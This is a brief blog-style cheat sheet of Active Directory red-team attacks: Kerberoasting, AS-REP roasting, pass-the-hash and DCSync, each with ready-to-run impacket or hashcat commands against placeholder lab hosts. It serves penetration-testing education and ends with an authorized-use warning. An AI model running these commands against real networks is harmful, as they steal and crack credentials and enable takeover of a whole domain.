Advertisement

Attack Active Directory

The most common Active Directory attacks used in red team engagements

Cyberah

20 Apr 2026

1 min read

— views

Read in: AR TR

Table of Contents

Kerberos Attacks
- Kerberoasting
- AS-REP Roasting
Privilege Escalation in Active Directory
- Pass-the-Hash
- DCSync — Dump All Hashes

Advertisement

Most internal penetration tests end with targeting Active Directory. This guide covers the essential attacks.

Kerberos Attacks

Kerberoasting

Targets Service Principal Names (SPNs) to extract service tickets and crack them offline.

# Extract service account tickets
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# Crack offline
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Targets accounts with Pre-Authentication disabled.

# Find vulnerable accounts
impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile users.txt

Privilege Escalation in Active Directory

Pass-the-Hash

# Use NTLM hash to authenticate without the plaintext password
impacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2

DCSync — Dump All Hashes

# Requires Domain Admin or DCSync rights
impacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc

Warning: Use these tools in authorized test environments only.